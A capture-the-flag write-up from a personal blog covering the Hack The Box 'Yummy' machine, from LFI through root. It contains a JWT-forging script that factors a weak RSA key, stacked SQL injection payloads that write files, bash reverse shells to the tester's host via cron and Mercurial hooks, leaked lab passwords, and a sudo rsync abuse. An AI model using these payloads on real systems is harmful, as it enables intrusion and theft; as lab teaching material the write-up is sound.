🧛
Acaard
  • WHOAMI
  • writeups
    • HTB Boxes
      • Headless (Easy)
      • Codify (Easy)
      • Builder (Medium)
      • Usage (Easy)
      • Sightless (Easy)
      • Cicada (Easy)
      • Yummy (Hard)
    • TuxCTFv2
      • Vampires Checker (Reverse)
      • wannaGOwithme (Reverse)
      • TuxHouse (Machine)
      • The Lair (web)
      • Die Todten (OSINT)
  • 💻Random but useful
    • Tmux
    • CPTS Review
Powered by GitBook
On this page
  • Enumeartion
  • Reading Files Using LFI
  • Administrator Access
  • SQL Injection and Shell as mysql
  • Shell as www-data Then User
  • Shell As dev
  • Root
  1. writeups
  2. HTB Boxes

Yummy (Hard)

Hard difficulty Linux box.....

PreviousCicada (Easy)NextTuxCTFv2

Last updated 3 months ago

Enumeartion

As usual we will start with a simple nmap scan:

Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 a2:ed:65:77:e9:c4:2f:13:49:19:b0:b8:09:eb:56:36 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNb9gG2HwsjMe4EUwFdFE9H8NguzJkfCboW4CveSS+cr2846RitFyzx3a9t4X7S3xE3OgLnmgj8PtKCcOnVh8nQ=
|   256 bc:df:25:35:5c:97:24:f2:69:b4:ce:60:17:50:3c:f0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEZKWYurAF2kFS4bHCSCBvsQ+55/NxhAtZGCykcOx9b6
80/tcp open  http    syn-ack ttl 63 Caddy httpd
|_http-title: Did not follow redirect to http://yummy.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Caddy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We will add "yummy.htb" to our /etc/hosts file and then check the website.

After making an account and logging in, we see we can reserve a table:

Upon filling data, visiting the dashbaord we will see we can save an iCalendar reminder of our reservation, saving it makes two requests: 1) First to /reminder/<NUMBER> which is a prepare to another request to download. 2) Second to /export/<FILE> which downloads the file.

Now let's try manipulating the file name in the "export" route to see if we can get LFI:

We see we get a 500, this is because the export request was already made and then exporting the .ics file, what we need to do here is to send the reminder request then export the file, EACH time.

Reading Files Using LFI

After sending the reminder request again, we try now:

After enumerating around to see what files are useful, we see the /etc/crontab file has some useful running scripts:

52 6	1 * *	root	test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
*/1 * * * * www-data /bin/bash /data/scripts/app_backup.sh
*/15 * * * * mysql /bin/bash /data/scripts/table_cleanup.sh
* * * * * mysql /bin/bash /data/scripts/dbmonitor.sh

Let's see if we can read any of those, starting with "table_cleanup.sh":

#!/bin/sh

/usr/bin/mysql -h localhost -u chef yummy_db -p'3wDo7gSRZIwIHRxZ!' < /data/scripts/sqlappointments.sql

We see we get the password for mysql, but we can't do much since it is not exposed, let's check "dbmonitor.sh":

#!/bin/bash

timestamp=$(/usr/bin/date)
service=mysql
response=$(/usr/bin/systemctl is-active mysql)

if [ "$response" != 'active' ]; then
    /usr/bin/echo "{\"status\": \"The database is down\", \"time\": \"$timestamp\"}" > /data/scripts/dbstatus.json
    /usr/bin/echo "$service is down, restarting!!!" | /usr/bin/mail -s "$service is down!!!" root
    latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
    /bin/bash "$latest_version"
else
    if [ -f /data/scripts/dbstatus.json ]; then
        if grep -q "database is down" /data/scripts/dbstatus.json 2>/dev/null; then
            /usr/bin/echo "The database was down at $timestamp. Sending notification."
            /usr/bin/echo "$service was down at $timestamp but came back up." | /usr/bin/mail -s "$service was down!" root
            /usr/bin/rm -f /data/scripts/dbstatus.json
        else
            /usr/bin/rm -f /data/scripts/dbstatus.json
            /usr/bin/echo "The automation failed in some way, attempting to fix it."
            latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
            /bin/bash "$latest_version"
        fi
    else
        /usr/bin/echo "Response is OK."
    fi
fi

[ -f dbstatus.json ] && /usr/bin/rm -f dbstatus.json

We see a script that monitors the state of the Database, checking when it was down and sending notifications for the root user, and also automating some stuff to fix it. Let's check the third script "app_backup.sh":

#!/bin/bash

cd /var/www
/usr/bin/rm backupapp.zip
/usr/bin/zip -r backupapp.zip /opt/app

We see it's making a zip archive of the running web application, storing it in "/var/www/backupapp.zip". Let's read this file using the same method, since it will be bytes, we will just use burpsuite to download it directly, and extract it.

find opt/ -maxdepth 3
opt/
opt/app
opt/app/middleware
opt/app/middleware/verification.py
opt/app/middleware/__pycache__
opt/app/app.py
opt/app/config
opt/app/config/signature.py
opt/app/config/__pycache__
opt/app/templates
opt/app/templates/register.html
opt/app/templates/login.html
opt/app/templates/index.html
opt/app/templates/admindashboard.html
opt/app/templates/dashboard.html
<SNIP>

Administrator Access

Now we have the source code of the application, and we can notice two things: 1) In the app.py, there's an "admindashboard" route, that checks for administrator role in the JWT. 2) in signature.py we can see how the tokens are being made and signed:

#!/usr/bin/python3

from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import sympy


# Generate RSA key pair
q = sympy.randprime(2**19, 2**20)
n = sympy.randprime(2**1023, 2**1024) * q
e = 65537
p = n // q
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)
key_data = {'n': n, 'e': e, 'd': d, 'p': p, 'q': q}
key = RSA.construct((key_data['n'], key_data['e'], key_data['d'], key_data['p'], key_data['q']))
private_key_bytes = key.export_key()

private_key = serialization.load_pem_private_key(
    private_key_bytes,
    password=None,
    backend=default_backend()
)
public_key = private_key.public_key()

We see it's basic RSA signing, so what we will do is get a valid token, extract the public key from it (n), then trying to factorize it to get p and q, which then leads us to generating d (the private key) so we can sign our own token and make our user an administrator.

Using chatGPT and some reading of the original signature.py code, we make this to make our own token:

import base64
import json
import jwt
import sympy
from Crypto.PublicKey import RSA
from cryptography.hazmat.primitives import serialization

# Given JWT token
token = "TOKEN HERE"

# Decode JWT Payload
payload = base64.urlsafe_b64decode(token.split(".")[1] + "===").decode()
claims = json.loads(payload)

# Extract & Rebuild RSA Private Key
n = int(claims["jwk"]['n'])  
e = 65537  
p, q = list(sympy.factorint(n).keys())
  
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)

# Construct Private Key
key = RSA.construct((n, e, d, p, q))
private_key_bytes = key.export_key()

# Load private key for signing
private_key = serialization.load_pem_private_key(
    private_key_bytes,
    password=None
)

# Decoding the original token
public_key = private_key.public_key()
data = jwt.decode(token, public_key, algorithms=["RS256"])

data['role'] = "administrator"
new_token = jwt.encode(data, private_key, algorithm="RS256")

print("New JWT Token:", new_token)

After running the script and using the output JWT, we now have access to the admin dashboard:

SQL Injection and Shell as mysql

                # added option to order the reservations
                order_query = request.args.get('o', '')

                sql = f"SELECT * FROM appointments WHERE appointment_email LIKE %s order by appointment_date {order_query}"
                cursor.execute(sql, ('%' + search_query + '%',))
                connection.commit()
                appointments = cursor.fetchall()
            connection.close()
<SNIP>

So Sending a single quote in the "o" parameter, we see a MYSQL error:

Now we can just run sqlmap on it and dump it, but that was useless so we need another approach, testing to write files, it was successful, as no error messages were shown:

http://yummy.htb/admindashboard?s=a&o=ASC;SELECT+%27VAMPIRE%27+INTO+OUTFILE+%27/tmp/vamp%27

Not seeing an error, means we can read and write files as the mysql service, now we already had file read using the LFI, but we need to leverage this file writing, looking back at the cron jobs we saw earlier there was an interesting action in "dbmonitor.sh":

    if [ -f /data/scripts/dbstatus.json ]; then
        if grep -q "database is down" /data/scripts/dbstatus.json 2>/dev/null; then
            /usr/bin/echo "The database was down at $timestamp. Sending notification."
            /usr/bin/echo "$service was down at $timestamp but came back up." | /usr/bin/mail -s "$service was down!" root
            /usr/bin/rm -f /data/scripts/dbstatus.json
        else
            /usr/bin/rm -f /data/scripts/dbstatus.json
            /usr/bin/echo "The automation failed in some way, attempting to fix it."
            latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
            /bin/bash "$latest_version"

Here, the script checks for the "dbstatus.json" file, if it exist, it checks if the database is down through it's content, if not, it's gonna execute the "fixer-v*" file, but notice the wild card? and we have file write access, so we can write anything there in a file and call it "fixer-vv" for example, and it will be executed.

First let's write the "dbstatus.json" file to make sure it's there and make sure it does NOT contain that the database is down, then write a bash reverse shell:

http://yummy.htb/admindashboard?s=a&o=ASC;SELECT+'VAMPIRE'+INTO+OUTFILE+'/data/scripts/dbstatus.json'

http://yummy.htb/admindashboard?s=a&o=ASC;SELECT+%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.34%2F9001%200%3E%261%27+INTO+OUTFILE+%27/data/scripts/fixer-vv%27

Doing these two requests then checking our listener we got a shell back!

nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.11.36] 46742
bash: cannot set terminal process group (30024): Inappropriate ioctl for device
bash: no job control in this shell
mysql@yummy:/var/spool/cron$ id
id
uid=110(mysql) gid=110(mysql) groups=110(mysql)

Shell as www-data Then User

Enumerating the system, we see that one of the cron jobs was running as "www-data" and not "mysql", the backup script:

*/1 * * * * www-data /bin/bash /data/scripts/app_backup.sh

Checking the permissions of the "scripts" directory, it is world writable, so we can just write a shell in app_backup.sh like "bash -i >& /dev/tcp/10.10.14.34/9001 0>&1", then we have another shell:

nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.11.36] 47314
bash: cannot set terminal process group (30357): Inappropriate ioctl for device
bash: no job control in this shell
www-data@yummy:/root$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Going to "/var/www" we see an application called "app-qatesting" which the running application and we see it is a repository but done in Mercurial (hg), which is version control system similar to git, let's see the change log:

www-data@yummy:~/app-qatesting$ hg log
changeset:   9:f3787cac6111
tag:         tip
user:        qa
date:        Tue May 28 10:37:16 2024 -0400
summary:     attempt at patching path traversal

changeset:   8:0bbf8464d2d2
user:        qa
date:        Tue May 28 10:34:38 2024 -0400
summary:     removed comments

changeset:   7:2ec0ee295b83
user:        qa
date:        Tue May 28 10:32:50 2024 -0400
summary:     patched SQL injection vuln

changeset:   6:f87bdc6c94a8
user:        qa
date:        Tue May 28 10:27:32 2024 -0400
summary:     patched signature vuln
<SNIP>

Reviewing some of the interesting commits, the 8th one (removed comments) have some credentials for "qa" user:

www-data@yummy:~/app-qatesting$ hg diff -c 8
diff -r 2ec0ee295b83 -r 0bbf8464d2d2 app.py
--- a/app.py    Tue May 28 10:32:50 2024 -0400
+++ b/app.py    Tue May 28 10:34:38 2024 -0400
@@ -19,8 +19,8 @@

 db_config = {
     'host': '127.0.0.1',
-    'user': 'chef',
-    'password': '3wDo7gSRZIwIHRxZ!',
+    'user': 'qa',
+    'password': 'jPAd!XQCtn8Oc@2B',
     'database': 'yummy_db',
     'cursorclass': pymysql.cursors.DictCursor,
     'client_flag': CLIENT.MULTI_STATEMENTS
@@ -254,17 +254,13 @@
<SNIP>

And we finally have a user!

qa@yummy:~$ wc -c user.txt
33 user.txt

Shell As dev

Checking our sudo rule for "qa":

qa@yummy:~$ sudo -l
Matching Defaults entries for qa on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User qa may run the following commands on localhost:
    (dev : dev) /usr/bin/hg pull /home/dev/app-production/

Since hg is a version control system, searching around we see we can add a hook, similar to ones in git, these hooks will let us execute system commands, this means we can get a shell as dev if we edited the "hgrc" file.

First we will make a directory in "/tmp" and call it "acaard", we will initialize a repository in it, and we HAVE to make this directory world writable because we will write in it as the "dev" user:

qa@yummy:/tmp$ mkdir acaard
qa@yummy:/tmp$ cd acaard/
qa@yummy:/tmp/acaard$ hg init
qa@yummy:/tmp$ chmod -R 777 acaard/

Then in "hg/hgrc" we will add:

[hooks]
changegroup = /tmp/vamp.sh

And this "vamp.sh" file just has a 1 liner bash reverse shell, and so after executing the "hg pull" command, then checking our listener:

qa@yummy:/tmp/acaard$ sudo -u dev /usr/bin/hg pull /home/dev/app-production/
nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.11.36] 54078
I'm out of office until February 24th, don't call me
dev@yummy:/tmp/acaard$ id
id
uid=1000(dev) gid=1000(dev) groups=1000(dev)

Root

As usual starting with "sudo -l", we see we can backup stuff from our home, using "rsync":

dev@yummy:~$ sudo -l
Matching Defaults entries for dev on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User dev may run the following commands on localhost:
    (root : root) NOPASSWD: /usr/bin/rsync -a --exclude\=.hg /home/dev/app-production/* /opt/app/

We see there is a wildcard which we can abuse to traverse back and backup whatever we want AND we can add any rsync options, my approach here was to backup the "/root" directory to read the flag and SSH keys, and add an option to make it world readable:

dev@yummy:~$ sudo /usr/bin/rsync -a --exclude=\.hg /home/dev/app-production/../../../root --chmod=777 /opt/app/
dev@yummy:~$ cat /opt/app/root/root.txt
0edacc5<SNIP>
dev@yummy:~$ ls /opt/app/root/.ssh
authorized_keys  id_rsa  id_rsa.pub

Using the "search" function, we see it sends a GET request like , Now if you remember we have the source code of the application, and it had an SQL Injection vulnerability:

Happy hacking :)

🧛
http://yummy.htb/admindashboard?s=&o=ASC
Home Page
Booking a Table
Trying the LFI
Successful LFI
Admin dashboard
Showing MYSQL error